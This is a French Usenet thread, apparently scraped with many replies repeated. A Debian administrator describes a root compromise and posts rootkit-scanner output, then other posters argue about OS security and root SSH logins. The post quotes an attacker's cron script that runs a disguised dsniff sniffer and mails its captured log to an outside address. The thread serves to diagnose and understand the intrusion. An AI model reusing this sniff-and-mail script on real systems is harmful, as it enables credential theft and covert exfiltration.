Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :
tout d'abord j'ai touvé dans le repertoire /home/client des fichiers
permettant de se connecter a
ebay via lynx .... ayant les droits root :| (cela m'a mis la puce a
l'oreille)
J'ai commencé à chercher :
il y a un faux syslogd qui s'appelle en réalité syslogd{ESPACE} qui
tourne :
--------------------------------------
leguenr@buroplan:/etc/rc1.d$ "/sbin/syslogd "
[sebd]-> starting
error: you need to be root (your uid: 1001) to run me
--------------------------------------
--------------------------------------------------
Checking `lkm'... You have 2 process hidden for readdir command
You have 2 process hidden for ps command
Warning: Possible LKM Trojan installed
--------------------------------------------------
passage de rkhunter -> tout ok ! sauf :
--------------------------------------
* Application version scan
- Exim MTA 3.36 [ Unknown
]
- GnuPG 1.0.6 [ Old or
patched version ]
- Bind DNS 9.2.1 [ Unknown
]
- OpenSSL 0.9.7e [ OK ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.8.1p1 [ OK ]
--------------------------------------
J'ai aussi trouvé : un cron dans /etc/cron.daily/dnsquery
ce fichier contenait :
--------------------------------------
root@buroplan:/root# cat dnsquery
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail dumycs@yahoo.com -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
---------------------------------------
pour information le fichier popauth en question etait un dsniff
le repertoir /usr/share/misc n'existe pas du moins pas vu de mon ls
il y'a pê un rootkit qui masque ce repertoire.
J'en suis la, j'ai killé les processus syslogd{ESPACE} et je l'ai
effacé mais
il est réapparu apres avoir rebooté. J'ai tenté de faire un
rapprochement
sur les dates de modification des fichiers mais il semblerait que
celles ci ait été modifiées.
J'ai retrouvé popauth et dnsquery avec comme user et group : 501.
cela m'a permit de faire un "find / -gid 501" pour trouver ces indices
! Bref,
Que dois-je faire ? La reinstallation complete n'est pas possible, du
moins pas pour l'instant
car je n'ai acces à cette machine que par ssh. Les données
compromises n'ont pas grande valeur
mais j'aimerai bien en savoir plus sur le comment !
Merci d'avance pour les informations que vous pourriez eventuellement
me donner :)
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Mes tests depuis plusieurs mois sous Debian testing me disent le contraire :-) Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun soucis sur Internet. Une telle configuration est impensable sous Windows, car dès la connexion établie j'attraperais de graves saloperies.
Michoko
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Mes tests depuis plusieurs mois sous Debian testing me disent le
contraire :-)
Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore
configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun
soucis sur Internet. Une telle configuration est impensable sous
Windows, car dès la connexion établie j'attraperais de graves saloperies.
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Mes tests depuis plusieurs mois sous Debian testing me disent le contraire :-) Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun soucis sur Internet. Une telle configuration est impensable sous Windows, car dès la connexion établie j'attraperais de graves saloperies.
Michoko
JF Pion
Michoko wrote:
pas de connexion en root
Pourquoi ?
parce que si tu te fait pirater à se momnet là le pirate a tous les droits
-- jf Pion No Neurone Inside des montages et liens modélistes :http://jean.francois.pion.free.fr/ l'électrique en avion rc : http://electrofly.free.fr/
Michoko <no_spam@news.free.fr> wrote:
pas de connexion en root
Pourquoi ?
parce que si tu te fait pirater à se momnet là le pirate a tous les
droits
--
jf Pion
No Neurone Inside
des montages et liens modélistes :http://jean.francois.pion.free.fr/
l'électrique en avion rc : http://electrofly.free.fr/
parce que si tu te fait pirater à se momnet là le pirate a tous les droits
-- jf Pion No Neurone Inside des montages et liens modélistes :http://jean.francois.pion.free.fr/ l'électrique en avion rc : http://electrofly.free.fr/
Noshi
On 04 Dec 2005 14:59:05 GMT, Michoko wrote:
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Mes tests depuis plusieurs mois sous Debian testing me disent le contraire :-) Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun soucis sur Internet. Une telle configuration est impensable sous Windows, car dès la connexion établie j'attraperais de graves saloperies.
Non. A partir du moment ou on installe un XP sp2 le firewall est actif sur les interfaces réseau, le système de mise a jour signale qu'il serait bien de le mettre en automatique. Déjà ces deux choses font que la machine est "mieux" protégée qu'avant. Ensuite en utilisant d'autres programmes que IE/OE (bien que maintenant on arrive a un bon niveau de sécurité avec les patch), et bien on descend le risque d'attraper une saloperie. Si on ajoute du safe hex. Le risque devient quasi nul. Y compris sans antivirus.
Michoko
Cordialement,
Noshi
On 04 Dec 2005 14:59:05 GMT, Michoko wrote:
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Mes tests depuis plusieurs mois sous Debian testing me disent le
contraire :-)
Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore
configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun
soucis sur Internet. Une telle configuration est impensable sous
Windows, car dès la connexion établie j'attraperais de graves saloperies.
Non. A partir du moment ou on installe un XP sp2 le firewall est actif sur
les interfaces réseau, le système de mise a jour signale qu'il serait bien
de le mettre en automatique. Déjà ces deux choses font que la machine est
"mieux" protégée qu'avant. Ensuite en utilisant d'autres programmes que
IE/OE (bien que maintenant on arrive a un bon niveau de sécurité avec les
patch), et bien on descend le risque d'attraper une saloperie. Si on ajoute
du safe hex. Le risque devient quasi nul. Y compris sans antivirus.
ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)
Mes tests depuis plusieurs mois sous Debian testing me disent le contraire :-) Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun soucis sur Internet. Une telle configuration est impensable sous Windows, car dès la connexion établie j'attraperais de graves saloperies.
Non. A partir du moment ou on installe un XP sp2 le firewall est actif sur les interfaces réseau, le système de mise a jour signale qu'il serait bien de le mettre en automatique. Déjà ces deux choses font que la machine est "mieux" protégée qu'avant. Ensuite en utilisant d'autres programmes que IE/OE (bien que maintenant on arrive a un bon niveau de sécurité avec les patch), et bien on descend le risque d'attraper une saloperie. Si on ajoute du safe hex. Le risque devient quasi nul. Y compris sans antivirus.
Michoko
Cordialement,
Noshi
Fabien LE LEZ
On 04 Dec 2005 17:36:24 GMT, (Xavier):
pas de connexion en root
Pourquoi ?
J'avoue que je suis moi aussi perplexe. SSH v2 est censé éviter le problème du man in the middle. Par contre, d'une manière générale, il y a rarement une raison valable de se connecter en root, donc l'interdiction d'une telle connexion peut être classée dans les règles à suivre pour le principe de précaution, sans que ça soit gênant.
On 04 Dec 2005 17:36:24 GMT, xavier@groumpf.org (Xavier):
pas de connexion en root
Pourquoi ?
J'avoue que je suis moi aussi perplexe. SSH v2 est censé éviter le
problème du man in the middle.
Par contre, d'une manière générale, il y a rarement une raison valable
de se connecter en root, donc l'interdiction d'une telle connexion
peut être classée dans les règles à suivre pour le principe de
précaution, sans que ça soit gênant.
J'avoue que je suis moi aussi perplexe. SSH v2 est censé éviter le problème du man in the middle. Par contre, d'une manière générale, il y a rarement une raison valable de se connecter en root, donc l'interdiction d'une telle connexion peut être classée dans les règles à suivre pour le principe de précaution, sans que ça soit gênant.
Cedric Blancher
Le Mon, 05 Dec 2005 20:06:51 +0000, Xavier a écrit :
Mpffft :-) Ceux qui disent ça tapent en général sudo comme première commande....
Ce qui présente un intérêt dès lors qu'on a plus d'une personne en possession de droits superutilisateur (et pas forcément tous).
-- 72 fufeurs font un séminaire sur un plateau du Cantal (les 54 habitués plus 18 sympathisants). Un pompier passant par hasard entend les discussions et conclut à une insolation générale. -+- JR in: Guide du Cabaliste Usenet - Chauffe, Marcel ! -+-
Le Mon, 05 Dec 2005 20:06:51 +0000, Xavier a écrit :
Mpffft :-) Ceux qui disent ça tapent en général sudo comme première
commande....
Ce qui présente un intérêt dès lors qu'on a plus d'une personne en
possession de droits superutilisateur (et pas forcément tous).
--
72 fufeurs font un séminaire sur un plateau du Cantal (les 54
habitués plus 18 sympathisants). Un pompier passant par hasard
entend les discussions et conclut à une insolation générale.
-+- JR in: Guide du Cabaliste Usenet - Chauffe, Marcel ! -+-
Le Mon, 05 Dec 2005 20:06:51 +0000, Xavier a écrit :
Mpffft :-) Ceux qui disent ça tapent en général sudo comme première commande....
Ce qui présente un intérêt dès lors qu'on a plus d'une personne en possession de droits superutilisateur (et pas forcément tous).
-- 72 fufeurs font un séminaire sur un plateau du Cantal (les 54 habitués plus 18 sympathisants). Un pompier passant par hasard entend les discussions et conclut à une insolation générale. -+- JR in: Guide du Cabaliste Usenet - Chauffe, Marcel ! -+-
